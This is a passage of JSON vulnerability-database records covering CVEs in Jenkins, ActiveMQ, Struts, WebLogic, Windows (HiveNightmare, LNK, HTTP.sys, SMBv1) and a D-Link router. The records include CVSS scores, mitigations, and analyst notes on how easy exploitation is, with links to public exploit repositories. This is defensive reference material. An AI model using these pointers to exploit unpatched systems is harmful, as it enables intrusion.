"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:26:13", "type": "osv", "title": "Code execution in Apache Struts 1 plugin", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2023-03-28T05:47:03", "id": "OSV:GHSA-29RM-6752-GVWV", "href": "https://osv.dev/vulnerability/GHSA-29rm-6752-gvwv", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-05-27T15:15:16", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:01:00", "type": "github", "title": "Deserialization of Untrusted Data in Jenkins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2023-01-27T05:02:25", "id": "GHSA-HHPM-5CP2-HG4X", "href": "https://github.com/advisories/GHSA-hhpm-5cp2-hg4x", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T15:24:29", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-14T01:14:51", "type": "github", "title": "Improper Input Validation in Apache ActiveMQ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2023-01-27T05:02:20", "id": "GHSA-RXQH-FC23-GXP2", "href": "https://github.com/advisories/GHSA-rxqh-fc23-gxp2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:15:14", "description": "The Struts 1 plugin used with Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T01:26:13", "type": "github", "title": "Code execution in Apache Struts 1 plugin", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2023-02-01T05:04:17", "id": "GHSA-29RM-6752-GVWV", "href": "https://github.com/advisories/GHSA-29rm-6752-gvwv", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-05-27T14:38:07", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-14T04:52:17", "type": "redhatcve", "title": "CVE-2018-1000861", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2023-04-06T04:55:45", "id": "RH:CVE-2018-1000861", "href": "https://access.redhat.com/security/cve/cve-2018-1000861", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T10:40:41", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.\n#### Mitigation\n\nUsers are advised to use other FTP and HTTP based file servers for transferring blob messages. Fileserver web application SHOULD NOT be used in older version of the broker and it should be disabled (it has been disabled by default since 5.12.0). This can be done by removing (commenting out) the following lines from conf\\jetty.xml file \n\n\n<bean class="org.eclipse.jetty.webapp.WebAppContext"> \n <property name="contextPath" value="/fileserver" /> \n <property name="resourceBase" value="${activemq.home}/webapps/fileserver" /> \n <property name="logUrlOnStart" value="true" /> \n <property name="parentLoaderPriority" value="true" /> \n</bean> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-24T17:18:23", "type": "redhatcve", "title": "CVE-2016-3088", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2020-08-18T13:55:57", "id": "RH:CVE-2016-3088", "href": "https://access.redhat.com/security/cve/cve-2016-3088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-02T22:49:12", "description": "The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-07-10T19:19:45", "type": "redhatcve", "title": "CVE-2017-9791", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791"], "modified": "2020-08-18T14:00:41", "id": "RH:CVE-2017-9791", "href": "https://access.redhat.com/security/cve/cve-2017-9791", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-05-27T14:37:20", "description": "A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier in stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2018-1000861", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1000861"], "modified": "2020-07-30T00:00:00", "id": "AKB:CF786BB6-FE33-44E5-A228-09F3AF0A9BDF", "href": "https://attackerkb.com/topics/7QecWDLgpk/cve-2018-1000861", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:18:20", "description": "Windows Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**Dviros** at July 25, 2021 9:35am UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing to parse the hashes while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\n**ccondon-r7** at July 21, 2021 4:24pm UTC reported:\n\nVulnerability is easy to exploit \u2013 by interacting with the local ShadowCopy volume, and copying it to a local folder, attackers can easily elevate their privileges. \nSeveral exploits were already released, allowing to parse the hashes while copying the SAM\\SECURITY\\SYSTEM hives: \n<https://github.com/cube0x0/CVE-2021-36934> \n<https://github.com/HuskyHacks/ShadowSteal>\n\nThis vulnerability occurs due to the permissive \u201cC:\\Windows\\System32\\Config*.*\u201d privileges, \u201cBUILTIN\\Users\u201d, allowing any user to read and execute the files.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T00:00:00", "type": "attackerkb", "title": "CVE-2021-36934 Windows Elevation of Privilege", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-31T00:00:00", "id": "AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C", "href": "https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T11:18:02", "description": "Heap-based buffer overflow in IOHIDFamily in Apple iOS before 8 and Apple TV before 7 allows attackers to execute arbitrary code in a privileged context via an application that provides crafted key-mapping properties.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2014-09-18T00:00:00", "type": "attackerkb", "title": "CVE-2014-4404", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2020-07-30T00:00:00", "id": "AKB:23B9CC54-2DB4-465A-9577-ECB057226184", "href": "https://attackerkb.com/topics/srG4Igcpc1/cve-2014-4404", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T02:19:29", "description": "The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-02-23T00:00:00", "type": "attackerkb", "title": "CVE-2015-2051", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2051"], "modified": "2020-06-05T00:00:00", "id": "AKB:C0EF2360-1359-4F11-9D34-3C8449D5D458", "href": "https://attackerkb.com/topics/PS3d6TA3vd/cve-2015-2051", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:12:19", "description": "Windows Shell in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka \u201cLNK Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:12am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T00:00:00", "type": "attackerkb", "title": "CVE-2017-8464", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2020-07-30T00:00:00", "id": "AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460", "href": "https://attackerkb.com/topics/CESmJpn7xk/cve-2017-8464", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:37:14", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\n**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T00:00:00", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2021-07-27T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-26T14:50:44", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-01T00:00:00", "type": "attackerkb", "title": "CVE-2016-3088", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2020-07-30T00:00:00", "id": "AKB:ABFF4219-8761-4AC4-9E3C-575E8A85BE9E", "href": "https://attackerkb.com/topics/RvP2yYHWzR/cve-2016-3088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-28T02:14:07", "description": "HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \u201cHTTP.sys Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**meikster** at March 04, 2020 9:13am UTC reported:\n\nThis vulnerability can still be seen in some companies during internal assessments, however no working exploitation code exists. Only scanners/checkers. SecuritySift managed to achieve information disclosure, however information retrieved is generally not useful. \n<http://www.securitysift.com/an-analysis-of-ms15-034/>\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 1\n", "cvss3": {}, "published": "2015-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2015-1635", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2020-07-30T00:00:00", "id": "AKB:AFD63479-75F9-45C2-81E4-F551BD3C99C5", "href": "https://attackerkb.com/topics/VU9gDWMU2f/cve-2015-1635", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:39:27", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0143", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 